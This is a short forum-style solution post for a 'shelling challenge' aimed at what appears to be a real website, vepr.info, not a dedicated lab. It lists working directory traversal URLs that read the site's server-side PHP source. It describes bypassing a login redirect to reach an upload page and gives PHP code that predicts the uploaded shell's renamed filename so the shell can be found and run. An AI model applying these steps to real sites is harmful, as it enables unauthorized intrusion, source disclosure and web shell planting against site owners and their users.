Zen's Shelling Challenge [Solution]

1. So, the challenge was to shell the site..
2. It was vulnerable to Directory Traversal. Some mistook it for LFI and were trying stuff like using PHP wrappers, but the real vulnerability was here:
3.  
4. http://www.vepr.info/zobraz_pohadku.php?pohadka=baron.txt .. http://prntscr.com/86fm87
5.  
6. After crawling through the site, we found /upload.php. Visiting that page redirects you to http://www.vepr.info/login.php?act=2&reason=99, but that's easily bypassed using NoRedirect.
7.  
8. First, let's read the file:
9. http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/upload.php .. http://prntscr.com/86fnk3
10.  
11. By examining upload.php, we see it includes a function through require(). Next, we'll read includes/func.php:
12.  
13. http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/includes/func.php .. http://prntscr.com/86fpby
14.  
15. In func.php, there's a function that takes a file name, does some processing, and appends a timestamp to it. Here's the relevant code:
16.  
17. ---
18. function dwn_name($name){
19.   $oldname = basename($name);
20.   $i = 0;
21.   while((substr($oldname,-$i-1,1) != ".") && ($i < strlen($oldname)))
22.     $i++;
23.   $ext = substr($oldname,-$i,$i);
24.   $base = substr($oldname,0,strlen($oldname)-$i-1);
25.   return $base."_[".substr(time(),1,7)."].".$ext;
26. }
27. $x = $_REQUEST['shell'];
28. echo dwn_name($x);
29. ---
30.  
31. Save this function for later use. Now, before accessing upload.php, add /login.php to NoRedirect's filter list. http://prntscr.com/86fss8 .. http://prntscr.com/86fxmz
32.  
33. When you receive this message http://prntscr.com/86fwu3, run the PHP code you saved earlier. It should generate something like this http://prntscr.com/86fx3t
34.  
35. Ta-da! http://prntscr.com/86fx9k